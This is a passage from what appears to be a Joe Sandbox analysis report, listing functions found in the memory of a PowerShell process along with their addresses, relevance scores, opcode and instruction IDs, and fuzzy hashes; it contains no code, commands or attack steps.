                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $]q$$]q$$]q
                                  • API String ID: 0-182748909
                                  • Opcode ID: 2a5021124e56e7aa2c6507db2e75c50bd22b5de03a0982361c51e6a83f099e1d
                                  • Instruction ID: adac87bdcbbe95d0a1d63936718641895918f3d447be2f09e81d9818eab98294
                                  • Opcode Fuzzy Hash: 2a5021124e56e7aa2c6507db2e75c50bd22b5de03a0982361c51e6a83f099e1d
                                  • Instruction Fuzzy Hash: D9415BB2B211168FCB74AA6D884036EB7E5EFC4614F14857AC945EB381DA33DD08C7E0
                                  Function 072853C8 Relevance: 3.5, Strings: 2, Instructions: 971COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q
                                  • API String ID: 0-3120983240
                                  • Opcode ID: 660bfaa3a423bd3a98dea38e36b03d89312c6e51b9061fcbda881e05f0108394
                                  • Instruction ID: 7f8b4fadb18e5e4ac944176c75a7107859c5a63ce255c97927078c8d7b1d4174
                                  • Opcode Fuzzy Hash: 660bfaa3a423bd3a98dea38e36b03d89312c6e51b9061fcbda881e05f0108394
                                  • Instruction Fuzzy Hash: D2928BB0A10215CFE764EB18C944F59BBB2EF84304F10C5A9D909AB396DB72ED85CF91
                                  Function 072812C8 Relevance: 3.0, Strings: 2, Instructions: 488COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q
                                  • API String ID: 0-3120983240
                                  • Opcode ID: 7161ca94b250383c021b482947fe2389e5fda6223cca4e68c66fec549d9fbecb
                                  • Instruction ID: eb147132c6fde9619f71dc464a0174a556d321ea53a7be7a1fe034436a3ad438
                                  • Opcode Fuzzy Hash: 7161ca94b250383c021b482947fe2389e5fda6223cca4e68c66fec549d9fbecb
                                  • Instruction Fuzzy Hash: EB12BEB0B212099FE754DB58C544BA9BBB2EF84704F24C069E905AF3D5CB72EC46CB91
                                  Function 07287233 Relevance: 2.9, Strings: 2, Instructions: 395COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q$4']q
                                  • API String ID: 0-3120983240
                                  • Opcode ID: 3e3c8abd055ba67db88fe019f30730c94d54a1be49b8305f4117ec617de53ee8
                                  • Instruction ID: e22b7ae01f7e648f2fdb67d1bbb7d87ba883b58f33014d5282444c4004262998
                                  • Opcode Fuzzy Hash: 3e3c8abd055ba67db88fe019f30730c94d54a1be49b8305f4117ec617de53ee8
                                  • Instruction Fuzzy Hash: EBF1F4B0B112148FD764EB68CD55B6EBBB2EF84304F1084A5D5096F392CB76ED81CB91
                                  Function 07283278 Relevance: 2.6, Strings: 2, Instructions: 140COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: tP]q$tP]q
                                  • API String ID: 0-145478062
                                  • Opcode ID: d486c7ed5ebad75a25a929edc12c6ba9f3bc29513068b8d6e229ecf223741bad
                                  • Instruction ID: 4b5a8607b642929cf51583e8240f62cf9bef7e37fba7dcf497b67809986d690a
                                  • Opcode Fuzzy Hash: d486c7ed5ebad75a25a929edc12c6ba9f3bc29513068b8d6e229ecf223741bad
                                  • Instruction Fuzzy Hash: 56417A706163429FC755DB68C86075EBFA1EF46B10F18848AE9849F2D3CB72DD06C7A1
                                  Function 07280A60 Relevance: 2.6, Strings: 2, Instructions: 77COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $]q$$]q
                                  • API String ID: 0-127220927
                                  • Opcode ID: 50adcc09438ea52aac5c69db9d33dfc20bf289442de1de877b6467784e0c6348
                                  • Instruction ID: 91c805cef7f5eaa18cf7d9861900910a769f1cc601407d47ab557dd5205689f6
                                  • Opcode Fuzzy Hash: 50adcc09438ea52aac5c69db9d33dfc20bf289442de1de877b6467784e0c6348
                                  • Instruction Fuzzy Hash: AA212BB6926356DFCB75AF2884402A5BFF0BF46210B1941A6CC84DB381D3329D08C7B1
                                  Function 072853AB Relevance: 2.0, Strings: 1, Instructions: 771COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: 0ed5f5124ad8ad6b853166b898802fe0214131930417214cc2bee022fc5ace49
                                  • Instruction ID: 533a4b1d36f86b7ccaf06e444fea8488354aa76b9174643647fc6b436c31c5d7
                                  • Opcode Fuzzy Hash: 0ed5f5124ad8ad6b853166b898802fe0214131930417214cc2bee022fc5ace49
                                  • Instruction Fuzzy Hash: D1728CB4A10215CFE764DB18C984F59BBB2FB84304F14C599D909AB392CB72ED85CF91
                                  Function 07285FCA Relevance: 1.8, Strings: 1, Instructions: 500COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: d774f28a76f45a813ba0d2525bb180ea99a9adf70c0b4f475b41a506462f9740
                                  • Instruction ID: 67e59b5897a448352d0f3a18d6944ff4d4c718e45aeaeb53b170437ee923c773
                                  • Opcode Fuzzy Hash: d774f28a76f45a813ba0d2525bb180ea99a9adf70c0b4f475b41a506462f9740
                                  • Instruction Fuzzy Hash: 03229DB0A20205CFE764DB18C945FA9BBB2FB84704F14C595D909AB392CB72ED85CF91
                                  Function 0728184D Relevance: 1.7, Strings: 1, Instructions: 462COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: 3fd5c1e87ae970286d2aa890830c2035a7ce64748e9b2bee8ae87dedb2e12146
                                  • Instruction ID: 182190f8b55e9a59a6b80c88a96f89a2bce01ebfc8589abcf64cd9145bd31cbe
                                  • Opcode Fuzzy Hash: 3fd5c1e87ae970286d2aa890830c2035a7ce64748e9b2bee8ae87dedb2e12146
                                  • Instruction Fuzzy Hash: FC12ABB0B21205DFEB54DB58C544BA9BBA2EF84708F14C459E905AF3D1CBB2EC46CB91
                                  Function 072812A8 Relevance: 1.7, Strings: 1, Instructions: 437COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: 8782aff07d80cfd0efd5e4a0bcd367c690be65f96bdd987414e733103440ce0e
                                  • Instruction ID: 0b17ac8fb21b421b8da1137e19bc220aef2905d2558c172bf4b7085bac040678
                                  • Opcode Fuzzy Hash: 8782aff07d80cfd0efd5e4a0bcd367c690be65f96bdd987414e733103440ce0e
                                  • Instruction Fuzzy Hash: B2028BB4B21209DFEB54DB58C544BA9BBB2EF84704F24C059E905AB3D1C7B2EC46CB91
                                  Function 07288D9C Relevance: 1.4, Strings: 1, Instructions: 132COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4']q
                                  • API String ID: 0-1259897404
                                  • Opcode ID: 8d94188c1e9ee6a85b80fbf5d72f923fffc114f2e3030856d6b761fb3a2c7cd3
                                  • Instruction ID: 4dde6370b334ee1d3ec87e29381ba373b550788f11405e58210d489b9f69a920
                                  • Opcode Fuzzy Hash: 8d94188c1e9ee6a85b80fbf5d72f923fffc114f2e3030856d6b761fb3a2c7cd3
                                  • Instruction Fuzzy Hash: 0B41F6F0B352038FDBA4AF24C550B697BE3AB60248F988466D501DB2D5D777D940CBA1
                                  Function 04562F50 Relevance: .5, Instructions: 515COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7493664e6ff7c4d05679c197ea77f204e095048da0a5d26db30f8148bb6bd734
                                  • Instruction ID: ef899f7e3577080a39e28a25f77f47aedf27d115ef6e2d78dd8204044d7e9cb2
                                  • Opcode Fuzzy Hash: 7493664e6ff7c4d05679c197ea77f204e095048da0a5d26db30f8148bb6bd734
                                  • Instruction Fuzzy Hash: 84221774A00209DFCB15CFA8D584AAEFBB2FF48310F258559E816AB365D731ED85CB90
                                  Function 04564A88 Relevance: .3, Instructions: 332COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8b34a06ed77b2e74f933345fd72d7c237b1f61b012b8d9730e2adbb10d8c1432
                                  • Instruction ID: e66877248392ffca9f57ad6fd08a588930bbb8c14e83b8f3901babc5497d130b
                                  • Opcode Fuzzy Hash: 8b34a06ed77b2e74f933345fd72d7c237b1f61b012b8d9730e2adbb10d8c1432
                                  • Instruction Fuzzy Hash: 4CD11674A00208EFDB14CF98D584AAEFBB6FF49310F248559E805AB365D731ED82DB94
                                  Function 04569180 Relevance: .3, Instructions: 324COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 410b9aa55f164e5e389aa506c4b7d12845ef1bddcfd4186e3cba302c01de6178
                                  • Instruction ID: dd72ec8404a4cf8a05f202a0d649ed9387e5e7f4fb66f5b78a4eeca8a0b39134
                                  • Opcode Fuzzy Hash: 410b9aa55f164e5e389aa506c4b7d12845ef1bddcfd4186e3cba302c01de6178
                                  • Instruction Fuzzy Hash: 72C1AFB1A00208DFCB14DFA8D584AADBBF6FF85314F118559E806AB365CB74ED49DB80
                                  Function 045639B0 Relevance: .3, Instructions: 317COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f54bf2eaacec8074e31cfc6d6b8444221ac05ba72a7a82942590586341e9c88e
                                  • Instruction ID: ba440da25f81f28fac92ddf829652cdf15b7c17a3e065c0a7468591c901b524f
                                  • Opcode Fuzzy Hash: f54bf2eaacec8074e31cfc6d6b8444221ac05ba72a7a82942590586341e9c88e
                                  • Instruction Fuzzy Hash: 9BD1F574A00209EFDB14CF98D584A9DFBB6FF88310F248559E80AAB365C731ED85DB90
                                  Function 0456EDE4 Relevance: .3, Instructions: 279COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: da753218b1bdd618612afb0971a1e3023b50b03186eae884fdf439f722b89c9d
                                  • Instruction ID: 492571a42f30eb60b47eb69d5459fcf18ddf7a59405ee29dd1dfb96eb64425b7
                                  • Opcode Fuzzy Hash: da753218b1bdd618612afb0971a1e3023b50b03186eae884fdf439f722b89c9d
                                  • Instruction Fuzzy Hash: 01B15F71E00209DFDF10CFA8E98579EBBF1BF88314F148529E816A7254EB74A846DF91
                                  Function 0456F6B5 Relevance: .3, Instructions: 266COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be0a5c568db3ebb5d182e60f8e030335fef269c42df57a5dd7d45c57f39eddc4
                                  • Instruction ID: 2a6f18e2e4cb5ec96cd449307bf3bdd63ef24724d9df75920605b85c588dab8d
                                  • Opcode Fuzzy Hash: be0a5c568db3ebb5d182e60f8e030335fef269c42df57a5dd7d45c57f39eddc4
                                  • Instruction Fuzzy Hash: D8B16072E00209DFDB10CFA8E9817DDBBF1BF48718F148529D41AE7254EB74A885DB91
                                  Function 07285020 Relevance: .2, Instructions: 247COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 02f3bbcdb54aafe357d6b26ce5b115893f004166e0ca86cba072e3d4522761be
                                  • Instruction ID: 357c6839515b8bf7fe0a6ad1531046838d71e9f29c5a1418ad81a4165e89a406
                                  • Opcode Fuzzy Hash: 02f3bbcdb54aafe357d6b26ce5b115893f004166e0ca86cba072e3d4522761be
                                  • Instruction Fuzzy Hash: D591D2B0B212049FD754EB58C955BAE7BE6EF88304F50C864E900AF395CB76EC54CB91
                                  Function 07285000 Relevance: .2, Instructions: 231COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32c5ffc2cbd183f2f624e08f363b39d984f460c5d5c651361bf2262072b48d74
                                  • Instruction ID: 173e0259dd15498955e4c3254475b57ba8aba54691d2c73c34495a79f381bdc0
                                  • Opcode Fuzzy Hash: 32c5ffc2cbd183f2f624e08f363b39d984f460c5d5c651361bf2262072b48d74
                                  • Instruction Fuzzy Hash: B791B0B0A212059FD754EF64C945BAABBF2EF88308F11C865E500AF395CB76EC54CB91
                                  Function 045689E8 Relevance: .2, Instructions: 201COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3389bfac6066b07ca2fd0cbb2d6561d29311d6e87b7ec309cf0f094098dac4aa
                                  • Instruction ID: ff269085738c0b3e46b16f91a639084ce469c11a23c0e8288d55c74a19d53d34
                                  • Opcode Fuzzy Hash: 3389bfac6066b07ca2fd0cbb2d6561d29311d6e87b7ec309cf0f094098dac4aa
                                  • Instruction Fuzzy Hash: 57718E30A06244DFCB15DF64D4849ADBBF6FF89314F1884A9E406AB362CB35ED85DB50
                                  Function 04569948 Relevance: .2, Instructions: 193COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4a5aa667797b6114ada6d62c0134d945cd4678b89ecaa91ade1343f2eeb0fb50
                                  • Instruction ID: dfd8d7b112a1dcf8501a8c31ec92fafd603a2ba2a9d90660aa1384a184d867cc
                                  • Opcode Fuzzy Hash: 4a5aa667797b6114ada6d62c0134d945cd4678b89ecaa91ade1343f2eeb0fb50
                                  • Instruction Fuzzy Hash: 9371AF70A002499FCB15DF68D880AAEBBF6FF85314F14856AE416DB391DB75EC46CB80
                                  Function 0456F42C Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ad6fc639db4737da202e69bc76f667af9955c26bc63d2a3365a1291b984f2e1
                                  • Instruction ID: 34b040b0578626733a2f1a8ccdf7dc9793088f36962d7275def80e89f94e5a2c
                                  • Opcode Fuzzy Hash: 5ad6fc639db4737da202e69bc76f667af9955c26bc63d2a3365a1291b984f2e1
                                  • Instruction Fuzzy Hash: 65716B72E00249DFDF10CFA8E84179EBBF2BF88314F148529D416A7254EB74A842DF95
                                  Function 04569AB6 Relevance: .2, Instructions: 188COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 843b4dd6f74dacda9897776938f37f8034d3f4fafe957c77ca245afad4071592
                                  • Instruction ID: 6f4108c4ac907d830b6b1eeac95f9234068d9331f225eb7a7e34fc0b1df9e22c
                                  • Opcode Fuzzy Hash: 843b4dd6f74dacda9897776938f37f8034d3f4fafe957c77ca245afad4071592
                                  • Instruction Fuzzy Hash: 94713A70A002089FDB18DFA8D584BADBBF6BF88314F148469E416AB360DB35AD46CB40
                                  Function 0456F438 Relevance: .2, Instructions: 180COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 32d2ca840ee1e087db4a4f4ef1f09b1d78034c7636f0e061fe6782cf4ffee9a8
                                  • Instruction ID: 022563112e8d6a13331b7d7b44ae459951ad353a4718d5292a7f036c482bc657
                                  • Opcode Fuzzy Hash: 32d2ca840ee1e087db4a4f4ef1f09b1d78034c7636f0e061fe6782cf4ffee9a8
                                  • Instruction Fuzzy Hash: F0716E71E00209DFDF10CFA9E88179EBBF2BF88714F148529E416A7254EB74A842DF95
                                  Function 045696D9 Relevance: .1, Instructions: 120COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 5ea5a4ac039ea7d449f3b094a01c21ba2384f34e11daccf22ed86b1a605b5db0
                                  • Instruction ID: ef159fe355ed5c260de59ae054ffc6d4892287c6a1d5ec88eb08da07dccf6ea0
                                  • Opcode Fuzzy Hash: 5ea5a4ac039ea7d449f3b094a01c21ba2384f34e11daccf22ed86b1a605b5db0
                                  • Instruction Fuzzy Hash: EF417971A002408FDB189F28D958AADBBF6FF8D750F085469E407EB7A1CB38AC41DB50
                                  Function 04569933 Relevance: .1, Instructions: 119COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6adc94828e4549a46051a9c969dc88ace75f703413819ac69ae309cf43d78259
                                  • Instruction ID: 154e64925aee57b5d50024cf1e9b6aede49cb200cffe3efb0fe614d4c90d6060
                                  • Opcode Fuzzy Hash: 6adc94828e4549a46051a9c969dc88ace75f703413819ac69ae309cf43d78259
                                  • Instruction Fuzzy Hash: 92414C70A002189FDB18DFA9D8847ADBBF6FF88314F158469D006EB795DB74AC45CB80
                                  Function 0728A5AC Relevance: .1, Instructions: 117COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aed968473401caae3a64bf976cb89dc1a6545d4818f389f0b8ef591ef18eb3d9
                                  • Instruction ID: f42bc03910682656ab1d047721e749496a2dbebf651e8cf89f6040f1f3972d0b
                                  • Opcode Fuzzy Hash: aed968473401caae3a64bf976cb89dc1a6545d4818f389f0b8ef591ef18eb3d9
                                  • Instruction Fuzzy Hash: 034126F1A322038FDBA5AA24854176D7BB2AB41305F08C4ABC504DF2D6DB3AD851CBA1
                                  Function 04563061 Relevance: .1, Instructions: 112COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3cb8ca0e2ff70002dc301d8220b232ec846bfcd1ba8ba722c9ff4462c6fa3277
                                  • Instruction ID: 183f3e00bd6290d7977afb3b5da57c10d217b14e249dcced16ee5e3124142db5
                                  • Opcode Fuzzy Hash: 3cb8ca0e2ff70002dc301d8220b232ec846bfcd1ba8ba722c9ff4462c6fa3277
                                  • Instruction Fuzzy Hash: 624116B4A005059FCB19CF58C5D49AAFBB1FF48310B168669D916AB364C732FC94CFA4
                                  Function 072882EE Relevance: .1, Instructions: 102COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 475441d0bce98d02c2a9237b24bd03cc1e8154a6495973e7f50e2bf923f31dd9
                                  • Instruction ID: 599a28951ec783fdd8162c5490b093d36a6e8f83750211279ed8bfaaa4994524
                                  • Opcode Fuzzy Hash: 475441d0bce98d02c2a9237b24bd03cc1e8154a6495973e7f50e2bf923f31dd9
                                  • Instruction Fuzzy Hash: FE31C0707602049FE744AB74C955BAE7AA3EF84708F10C824E9016F3D1CF7A9C45CBA1
                                  Function 07280E18 Relevance: .1, Instructions: 94COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b047e89406378eb823568e867a9d3499d3ed960c91adb9f0e49d857b7254a087
                                  • Instruction ID: faa0c7b683dd9d0de386f8c54bad824902d2ccd776437cbb4e8e61a368f9330d
                                  • Opcode Fuzzy Hash: b047e89406378eb823568e867a9d3499d3ed960c91adb9f0e49d857b7254a087
                                  • Instruction Fuzzy Hash: A0217CB132039A9BD7B4697E884473B7AC6ABC5705F24883BA545DB2C1DEB7D848C360
                                  Function 0456C3B8 Relevance: .1, Instructions: 92COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9a72def8b810fa9cebbdee3db5974a6007bd37a71aa9e1bea0daa97382081b2c
                                  • Instruction ID: 4b6fee62b4e858fd63bc5d2d4a1595b16649d3b77cb047580da5d7c4119e0f0f
                                  • Opcode Fuzzy Hash: 9a72def8b810fa9cebbdee3db5974a6007bd37a71aa9e1bea0daa97382081b2c
                                  • Instruction Fuzzy Hash: 32311F30B011288FCB26DB64D8546EEB7B2BF4A304F1444E9D40AAB352DF35AE81DF81
                                  Function 07280DFC Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3348346393.0000000007280000.00000040.00000800.00020000.00000000.sdmp, Offset: 07280000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7280000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8aedc6207ce0e3cd42cd375dbe1b3bb3f945d85f33ce889705659d917cc4a832
                                  • Instruction ID: 08e29fa5ae8a7e5286af32385958906923f3c832dc515c2f5babf4c383077e56
                                  • Opcode Fuzzy Hash: 8aedc6207ce0e3cd42cd375dbe1b3bb3f945d85f33ce889705659d917cc4a832
                                  • Instruction Fuzzy Hash: 2A21BEB13293C6AFE7B45A39884033A3F925F41701F1888679584DB1D2CAB6DD48C331
                                  Function 04563995 Relevance: .1, Instructions: 74COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.3326066620.0000000004560000.00000040.00000800.00020000.00000000.sdmp, Offset: 04560000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_4560000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 69e02f974cdac1d33775ba73ff1c6168bfb3be9a47afda4a1ed0fa4089c14791
                                  • Instruction ID: 96189716828041e64f11010255ec10e23678403d22187bc3a029b34847c8f3f1
                                  • Opcode Fuzzy Hash: 69e02f974cdac1d33775ba73ff1c6168bfb3be9a47afda4a1ed0fa4089c14791
                                  • Instruction Fuzzy Hash: 7D316BB4A04645DFCB04CF88C9949AAFBF1FF49310B1585A9D849EB762C735EC41CBA0
                                  Function 04564A78 Relevance: .1, Instructions: 70COMMON
                                  Download Yara Rule
                                  Memory Dump Source
